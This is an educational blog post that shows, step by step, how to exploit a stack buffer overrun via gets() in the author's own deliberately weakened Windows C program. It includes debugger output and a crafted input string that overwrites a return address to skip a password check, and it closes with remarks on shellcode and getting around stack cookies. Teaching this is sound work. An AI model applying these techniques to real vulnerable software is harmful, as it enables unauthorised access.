Let's Exploit a Buffer Overrun!

Posted Jan 4, 2024 Updated Feb 29, 2024

By Christopher Akers 21 min read

Well, sort of…

Disclaimer

This is not a particularly ‘clever’ example or one that can be used for genuine nefarious purposes in the year 2023.

The example program we ‘hack’ is small, written by me, and deliberately contrived for success. We compile it using vanilla cl.exe on the command-line with no additional options and we deliberately disable Microsoft’s Safebuffers, something nobody is going to do. Finally, we exploit through a very old C standard library function, a function that was officially replaced in 2011 due to the very vulnerability we’re exploiting.

In all, this example is best described, in British colloquial parlance, as ‘Noddy’. It might have gotten you somewhere in 1987 but not now. It’s purpose is to illustrate what a buffer overrun is, exactly, and just one way in which they can leave software open to attack. Plus, it’s fun.

Inspiration for this exercise came from an early chapter of Expert C Programming: Deep C Secrets by Peter Van De Linden, a book that was last published in 1994. This should give you some idea of how out of date this example is. Despite it’s age, though, the book is a great read filled with historic anecdotes and info about the C language. It’s still available from Amazon for Kindle.

Expert C Programming: Deep C Secrets, by Peter Van De Linden

Overview

Take the code snippet below.

  
int print_message() {
    char message[14];
    message = "Hello World!\n";
    printf("%s");
}

We define an array of char with fourteen elements then fill the array with the message ‘Hello World!’ (twelve characters plus the new-line and room for the terminating NUL character).

The array contents are printed to stdout using printf.

The array is local so it’s stored in the Local Variables section of the stack-frame for print_message(). The diagram below shows a simplified version of the Win64 stack layout.

Windows x64 Stack Layout

The size of the local variables section of a stack-frame is fixed at compile time. The compiler detects the number of local variables in a function, what type they are (and, therefore, what size they are) and emits specific cpu instructions to create and size the stack-frame whenever that function is called. In this example, space for fourteen char elements will be allocated in the local variables section of the stack-frame for print_message() which is 14-bytes.

Now look at this small modification to the code.

  
int print_message() {
    char message[14];
    message = "Hello World, how are you all?\n";
    printf("%s");
}

It’s the same sized array, but this time we load it with thirty one elements (including newline and terminating NUL). In C and a lot of lower-level languages there’s nothing stopping you from doing this. There are no runtime checks to ensure you’re only loading up to the maximum number of elements allocated to an array. If you want these checks you have to program them yourself and, it turns out, many developers in the past ..er.. didn’t.

So, where are these additional elements stored? Well, along with the rest of the array in the Local Variable section of the print_message() stack-frame. Except, now, those extra elements have overwritten parts of that section reserved for other local variables. They could even have bled outside the section and overwritten the return address and parts of the calling functions’s stack-frame. We’ve overrun our buffer.

Ordinarily, this would result in stack corruption and probably a crash shortly after, but there are a number of, arguably, more worrying vulnerabilities.

For example, it’s possible to add enough elements to our array so that it overwrites the return address with a new return address. That is, when the function finishes execution we can make it branch to code not intended by the original programmer.

… Which is what we’re going to do in this post.

The Vulnerability: gets()

gets() man page

The gets() function (Get String) used to be part of the standard C library. It takes an array of char as a parameter then waits for the user to input a string via stdin to be terminated by newline (pressing enter). The string is stored in the array.

There are no array bounds checks in gets(). You may pass it a char array of twenty but the user could then input ten, fifty, one-thousand characters. It will still write that entire array back to the stack, overwriting anything in the way.

gets() was ejected from the C standard library in 2011 (along with other, similar functions) and has since been replaced with fgets() which takes an additional int parameter representing the size of the array. This version does carry out a bounds check and only stores the maximum number of char’s allocated, regardless of how many the user enters. By now, I’m sure fgets() has replaced any occurrence of gets() in everybody’s Production code …. right?

Our Target Program

Below is the example program we’re going to use for this demonstration.

  
#include <stdio.h>
#include <stdbool.h>

static __declspec(safebuffers)
bool check_password() {
    char pwd[20];
    printf("Enter your super secret password:");
    gets(pwd);

    // You can never enter the right password in this
    // program ;-)
    return false;
}

int main() {
    // We want to by-pass this check
    if (!check_password()) {
        printf("Oh no! You entered the wrong password!");
        exit(1);
    }

    // Past this point, you're loose in the system
    printf("Logging you on....\n");
    exit(0);
}

A function called check_password() uses gets() to accept a string which will be loaded into an array of char’s. A Boolean value is returned causing main() to exit with return code 1 if false, or continue if true.

The thing is check_password() never returns true, always false. It’s impossible to enter the correct password and you will never get past the check … unless you can find some way of jumping over it and into the rest of the program.

Safebuffers

Our target program will run on Windows and we’l compile it using the MSVC Compiler (cl.exe). By default cl.exe inserts a check called Safebuffers to mitigate against buffer overrun attacks. A ‘cookie’, or value is inserted at the top of the Local Variables section of the stack during the function prologue, and then checked again during the function epilogue. A change in that value is seen as a strong indication that some variable in the function has written beyond it’s allocated space. Windows will terminate the program immediately.

Below is an IDA disassembly of check_password() with Safebuffers enabled. You can see the stack cookie being set-up in the prologue where it’s stored in a local variable (var_10) at the top of the Local Variables section of the stack-frame. It’s generated by xor‘ing a global __security_cookie value with the value in rsp (the stack base-pointer). The variable is checked just before function epilogue with a call to __security_check_cookie.

Note that __security_check_cookie will actually terminate the program if it finds a problem which is why you don’t see anything checking a return value after the call. If there isn’t an issue everything can just continue.

check_password() disassembly with Safebuffers enabled

Safebuffers can be disabled for specific functions by adding the following line above the function prototype.

  
static __declspec(safebuffers)

You can see this in line 4 of our program listing, above.

Below is an IDA disassembly of check_password() again, but this time with safebuffers disabled. You can see the injected security cookie checks are no longer present.

check_password() disassembly with Safebuffers disabled

For more information, see Microsoft’s documentation: https://learn.microsoft.com/en-us/cpp/cpp/safebuffers?view=msvc-170

Let’s Exploit!

Compile the test program. I do this using the Visual Studio x64 Native Tools Command Line and cl.exe as this removes a lot of the default options that Visual Studio applies when you build through the IDE. We want this to be a vanilla compilation.
Compiling the Test Program
Once compiled, load into the IDA Disassembler. This can be downloaded for free: https://hex-rays.com/ida-free/.
Note down the offset of the main() function in the image. IDA will probably open the file in ‘Graph Mode’, so you will need to right-click and select ‘Text Mode’.
The full diassembly for main() is below and you can see the function image starts at an offset of 0x00000001`40001030 in the executable (the offsets are the numbers on the left).
Finding the location of the main() function in the executable
By default, Windows 64 executables store their code image at offset 0x00000001`40000000 (known as the Image Base), but it can be changed. To confirm, we can scroll to the top of the IDA disassembly and check the global Image Base value.
Finding the global image base value in the executable
Taking the difference between the two, we now know that the main() function is at a 0x1030 byte off-set from the global image base in the executable. Remember this number because we’ll use it to locate the function in memory when we run the program.
Start our Target Program executable but stop at the empty password prompt.
Start the program but stop right here
Immediately take a dump of the process from Task Manager but leave it running.
Take a dump of the program but leave it running
Start WinDbg and load the dump taken in step 1, above.
Find out where our Target Program’s code-base has been loaded by using the lm command and noting the value in the start column.
1 2 3 4 0:000> lm m exploit_buffer_overrun Browse full module list start end module name 00007ff7`beb40000 00007ff7`beb69000 exploit_buffer_overrun C (no symbols)
Add the offset found above (0x1030), to the start address. This gives us an address of 00007ff7`beb41030, our expected location of main().

Disassemble using uf to confirm.

 0:000> uf 00007ff7`beb41030
 exploit_buffer_overrun+0x1030:
 00007ff7`beb41030 4883ec28        sub     rsp,28h
 00007ff7`beb41034 e8c7ffffff      call    exploit_buffer_overrun+0x1000 (00007ff7`beb41000)
 00007ff7`beb41039 0fb6c0          movzx   eax,al
 00007ff7`beb4103c 85c0            test    eax,eax
 00007ff7`beb4103e 7516            jne     exploit_buffer_overrun+0x1056 (00007ff7`beb41056)  Branch

 exploit_buffer_overrun+0x1040:
 00007ff7`beb41040 488d0de11f0200  lea     rcx,[exploit_buffer_overrun+0x23028 (00007ff7`beb63028)]
 00007ff7`beb41047 e884000000      call    exploit_buffer_overrun+0x10d0 (00007ff7`beb410d0)
 00007ff7`beb4104c b901000000      mov     ecx,1
 00007ff7`beb41051 e85a690000      call    exploit_buffer_overrun+0x79b0 (00007ff7`beb479b0)

 exploit_buffer_overrun+0x1056:
 00007ff7`beb41056 488d0df31f0200  lea     rcx,[exploit_buffer_overrun+0x23050 (00007ff7`beb63050)]
 00007ff7`beb4105d e86e000000      call    exploit_buffer_overrun+0x10d0 (00007ff7`beb410d0)
 00007ff7`beb41062 33c9            xor     ecx,ecx
 00007ff7`beb41064 e847690000      call    exploit_buffer_overrun+0x79b0 (00007ff7`beb479b0)
 00007ff7`beb41069 33c0            xor     eax,eax
 00007ff7`beb4106b 4883c428        add     rsp,28h
 00007ff7`beb4106f c3              ret

Seems legit. You can compare it with the dissembler output in IDA but the function is very simple and, in this test case, we actually have the source code so can confirm quickly that it’s the right one.

Now, we’re going to take a look at the stack trace.

000> k
 # Child-SP          RetAddr               Call Site
000000c8`298ffbc8 00007ffe`a58a6b2b     ntdll!NtReadFile+0x14
000000c8`298ffbd0 00007ff7`beb53e21     KERNELBASE!ReadFile+0x7b
000000c8`298ffc40 00007ff7`beb53b2a     exploit_buffer_overrun+0x13e21
000000c8`298ffce0 00007ff7`beb51db7     exploit_buffer_overrun+0x13b2a
000000c8`298ffd20 00007ff7`beb475bb     exploit_buffer_overrun+0x11db7
000000c8`298ffd50 00007ff7`beb4101a     exploit_buffer_overrun+0x75bb
000000c8`298ffdb0 00007ff7`beb41039     exploit_buffer_overrun+0x101a
000000c8`298ffe00 00007ff7`beb41318     exploit_buffer_overrun+0x1039
000000c8`298ffe30 00007ffe`a7e2257d     exploit_buffer_overrun+0x1318
000000c8`298ffe70 00007ffe`a84eaa58     kernel32!BaseThreadInitThunk+0x1d
 0a 000000c8`298ffea0 00000000`00000000     ntdll!RtlUserThreadStart+0x28

Note the RetAddr value for stack-frame 0x06: 0x00007ff7`beb41039. It is 0x9 bytes offset from the start of our main() function, according to the location we worked out in the previous step. You can see what instruction this is in the main() disassembly, above. It’s just after the first call on line 4. It’s a weird looking one, but all it’s doing is zeroing out all values in eax except for the ones in its lower byte (move with zero-extension).

 00007ff7`beb41034 e8c7ffffff      call    exploit_buffer_overrun+0x1000 (00007ff7`beb41000)
 00007ff7`beb41039 0fb6c0          movzx   eax,al

My money is on this call being the call to check_password(). We can confirm by looking in IDA again to get the location of check_password(). According to this call instruction, we should expect it at an offset of 0x1000 from the program’s code-base.

Finding the location of check_password() in the executable

Yep, that seems to be it. This means check_password() should be at address 0x00007ff7`beb40000 + 0x1000 (0x00007ff7`beb41000) in memory. Let’s uf that address in WinDbg.

 0:000> uf 0x00007ff7`beb41000
 exploit_buffer_overrun+0x1000:
 00007ff7`beb41000 4883ec48        sub     rsp,48h
 00007ff7`beb41004 488d0df51f0200  lea     rcx,[exploit_buffer_overrun+0x23000 (00007ff7`beb63000)]
 00007ff7`beb4100b e8c0000000      call    exploit_buffer_overrun+0x10d0 (00007ff7`beb410d0)
 00007ff7`beb41010 488d4c2420      lea     rcx,[rsp+20h]
 00007ff7`beb41015 e882660000      call    exploit_buffer_overrun+0x769c (00007ff7`beb4769c)
 00007ff7`beb4101a 32c0            xor     al,al
 00007ff7`beb4101c 4883c448        add     rsp,48h
 00007ff7`beb41020 c3              ret

Yay, there it is!

Now to find the exact location of our array (pwd) in the stack-frame.
In the check_password() disassembly above there are two call instructions. Looking in IDA, we can see the first is a call to printf which will be the password prompt. The second call is to gets(), the function that reads input and the one we’re trying to exploit. Just above both call’s are lea instructions (Load Effective Address) loading the address of something into rcx. (rcx is used to pass first parameter when calling a function according to the Windows ABI). In the first case, this will be the address of the string ‘Enter your super secret password:’ as the parameter to printf(), and in the second case it will be the address of our array (rsp+20h).
We can replace rsp with the stack-frame base address to find out exactly where this is in the stack-frame.
1 2 0:000> ?000000c8`298ffdb0+20h Evaluate expression: 859690761680 = 000000c8`298ffdd0
So, we expect our pwd array to be stored at address 000000c8`298ffdd0.

Now, lets dump out the entire stack-frame so we can find our array and the return address.

 #  Child-SP          RetAddr               Call Site
 ...
 06 000000c8`298ffdb0 00007ff7`beb41039     exploit_buffer_overrun+0x101a
 07 000000c8`298ffe00 00007ff7`beb41318     exploit_buffer_overrun+0x1039
 ...

Dump out bytes between the two Child-SP locations for stack-frame 06 and 07. I like dumping them 1 byte per column because I find it easier to read. It does generate a long listing, though.

The command is: db /c1 000000c8298ffdb0 (000000c8298ffe00-1)

We subtract 1 from the address of stack-frame 0x7 (main()) because that is actually the base address of stack-frame 0x7 which we don’t need.

Instead of just duplicating the listing from WinDbg, I’ve imported it into Excel and mapped out the different stack-frame sections for easier reading, but if you were to just view it in WinDbg you would see the first three columns.

Stack-frame 06

At the top we have the four eight-byte sections for register parameter home space. According to the Windows ABI 32-bytes of space must be always preserved for fastcall parameters, that is parameters passed in registers RCX, RDX, R8 and R9 when one function calls another. Note that the space is for parameters to be passed to a subsequent calling function, not actually this one. When a function is called from this one (in our case it will be gets()) it’s the new function that actually deposits their register parameters, here, just before it modifies the stack-pointer. Also note that this space can be used as separate scratch storage, too, especially if the code has been compiled as an optimised release. Either way we’re not concerned about this section in this exercise, or what it contains.

There’s no Additional Parameters section in the stack-frame because we only call gets() with one parameter which will be loaded into the RCX register then backed up in the home-space, as described above.

The Local Variables section has space allocated for our array at the exact address we expected from the step above: 000000c8`298ffdd0 and continuing for 20 bytes. There is an additional 20 bytes allocation after this which I believe is for alignment purposes. The stack-frame pointer (rsp) must be aligned on a 16-byte boundary, again according to the Windows ABI.

Finally, just outside the stack-frame, we have the 8-byte return address beginning at 0x000000c8`298ffdf8 (it appears backward due to the way it’s stored). The address is 0x00007ff7`beb41039 which matches the return address in our stack trace, above, and is the address of the line in main() just beneath the call where the result is loaded into rax ready for the check. This is the address we want to manipulate.

Let’s look at the disassembly of main() again.

 0:000> uf 00007ff7`beb41030
 exploit_buffer_overrun+0x1030:
 00007ff7`beb41030 4883ec28        sub     rsp,28h
 00007ff7`beb41034 e8c7ffffff      call    exploit_buffer_overrun+0x1000 (00007ff7`beb41000)
 00007ff7`beb41039 0fb6c0          movzx   eax,al
 00007ff7`beb4103c 85c0            test    eax,eax
 00007ff7`beb4103e 7516            jne     exploit_buffer_overrun+0x1056 (00007ff7`beb41056)  Branch

 exploit_buffer_overrun+0x1040:
 00007ff7`beb41040 488d0de11f0200  lea     rcx,[exploit_buffer_overrun+0x23028 (00007ff7`beb63028)]
 00007ff7`beb41047 e884000000      call    exploit_buffer_overrun+0x10d0 (00007ff7`beb410d0)
 00007ff7`beb4104c b901000000      mov     ecx,1
 00007ff7`beb41051 e85a690000      call    exploit_buffer_overrun+0x79b0 (00007ff7`beb479b0)

 exploit_buffer_overrun+0x1056:
 00007ff7`beb41056 488d0df31f0200  lea     rcx,[exploit_buffer_overrun+0x23050 (00007ff7`beb63050)]
 00007ff7`beb4105d e86e000000      call    exploit_buffer_overrun+0x10d0 (00007ff7`beb410d0)
 00007ff7`beb41062 33c9            xor     ecx,ecx
 00007ff7`beb41064 e847690000      call    exploit_buffer_overrun+0x79b0 (00007ff7`beb479b0)
 00007ff7`beb41069 33c0            xor     eax,eax
 00007ff7`beb4106b 4883c428        add     rsp,28h
 00007ff7`beb4106f c3              ret

Line’s 5, 6 and 7 are testing the check_password() result and branching if that result is true.

The test command (line 6) simply performs a logical AND on it’s parameters and sets the CPU zero-flag accordingly. In this case, if eax contains 0 (false) then ANDing it with itself will also result in 0 and will set the CPU zero-flag. If it contains 1 (true) then ANDing it with itself will result in 1 which will not set the zero flag (true).

JNE (Jump if Not Equal) is an instruction to branch if the previous command didn’t set the zero flag (check_password() returned true). If it did, then execution just drops to the next instruction at line 10 (0x00007ff7`beb41040) which is the section that prints the error message and exits with code 1.

How can we modify the the return address in stack-frame 06 so that it points to the same location as the one jumped to in line 7 (0x00007ff7`beb41056), as if the password check evaluated to true?

We overrun the buffer (or the array).

If we enter twenty characters into the password prompt of our program we fill up the array. If we then entered another 20 we fill up the alignment section of Local Variables (according to the diagram, above). Then all we need to do is enter: 5610b4bef77f0000 and the return address will be replaced.

… Well, not quite.

The string 5610b4bef77f0000 is just that, a string. All that will happen is the ASCII codes for each digit in 5610b4bef77f0000 will be loaded into the stack. What we want is the actual numbers, themselves, not their ASCII codes. To do that we’re going to need to use the Windows Numpad along with the ALT key.

Split the address up into it’s individual bytes: 56 10 b4 be f7 7f 00 00.
Convert those individual bytes into their decimal representation: 86 16 68 116 127 247 00 00
Now, open Notepad and, using the number-pad only on your keyboard, hold down ALT and enter each number up to the 00’s. After each number, release ALT. You will see whatever symbol notepad interprets the number as.
The table below formats it out so it’s a bit clearer:
HEX DEC Symbol
56 86 V
10 16 ►
b4 180 ┤
be 190 ╛
f7 247 ≈
7f 127 ⌂
Why don’t we add the 00’s? Fortunately, gets() adds the terminating 00 to our string, so we only need to make sure we enter up to the first 00. Entering 00 (effectively, hard-coded NUL) using the keyboard is actually quite tricky, anyway 😉.
So the string we have to enter when replacing the return address is: V►┤╛≈⌂ This will insert the correct bytes to make up our new address. Exciting.
Now back to the command prompt where we started our program and to enter the following string (remember, yours will be different, but following the steps above will get you the correct one)
For the ‘special’ characters that represent the new return address it’s best to enter those in Notepad first then paste them into the prompt at the right point. This saves having to do it all again if you make a mistake with the ALT key or the Windows command prompt decides to mess with you!
String to enter: XXXXXXXXXXXXXXXXXXXXZZZZZZZZZZZZZZZZZZZZV►┤╛≈⌂
This maps out to:
Array (20-bytes) Alignment (20-bytes) Return Address (6-bytes minus the 00’s)
XXXXXXXXXXXXXXXXXXXX ZZZZZZZZZZZZZZZZZZZZ V►┤╛≈⌂
There’s no particular reason I chose X and Z, they’re just filler characters. You can use whichever ones you want.
Fingers crossed, here we go…
…Did it work?
Logging You On!
Wohoo! We’ve replaced the check_password() function return address which has enabled us to ignore the result of the password check entirely. We’re in! 😱

HEX	DEC	Symbol
56	86	V
10	16	►
b4	180	┤
be	190	╛
f7	247	≈
7f	127	⌂

Array (20-bytes)	Alignment (20-bytes)	Return Address (6-bytes minus the `00`’s)
XXXXXXXXXXXXXXXXXXXX	ZZZZZZZZZZZZZZZZZZZZ	V►┤╛≈⌂

Conclusion

Once you get away from the abstractions of higher-level languages you get a sense of how everything is just a number to a CPU. It doesn’t understand the context in which you’re using these values, it doesn’t care that you might be behaving badly (or even mistakenly) when asking it to recalculate certain values in registers. It will simply do as its told.

In modern computing, compilation is still often seen as the end of the software engineers job. A lot of graduates will come out having mastered, say, the latest functional programming paradigm, but have never seen what any of their software looks like when it’s running through a CPU. There’s an assumption that the gate-keeping and rules of modern languages and abstractions mean code is safe if it gets as far as an executable. Anything else would have been caught by a compiler or an interpreter or a linter or even testing.

What actually happens is the gate-keeping is stripped-out altogether, it doesn’t exist at a machine-code level. Even something as basic as a type doesn’t really exist. All you need is a way in and you can start making changes that breach the cosy rules of your favourite programming language. Something as simple as a buffer overrun is one of those ways in.

Attacks can get way more sophisticated than a simple fudging of a return address, too. For instance, in the example above, we actually have 40-bytes to play with in the Local Variable space. Can we load opcode bytes into that local array, effectively writing a small program within the 40 bytes of space available and then set the return address to the top of the array? Why not? As long as there’s a way in.

Even Safebuffers can be circumvented if you know what the security-cookie value is, and you can find that out by dumping the stack-frame and getting its address from the disassembly, as we did above to locate the array. The CPU doesn’t care that those values make up a security cookie, that’s an abstraction implemented by the Windows ABI on top of those values. The CPU will happily change them or write over them if you ask it to.

As I pointed out earlier, the example in this post isn’t a particularly sophisticated hack, especially in 2023, but I had fun going through it to see if I could get it to work. It was surprisingly simple, and I think that’s important. It’s easy to dismiss these kinds of things as something only someone with intimate cyber knowledge and experience can accomplish but, despite the set-up being very contrived, I still managed to do it without any particularly sophisticated knowledge or expensive tools.

All good, clean fun! 😬

tech

This post is licensed under CC BY 4.0 by the author.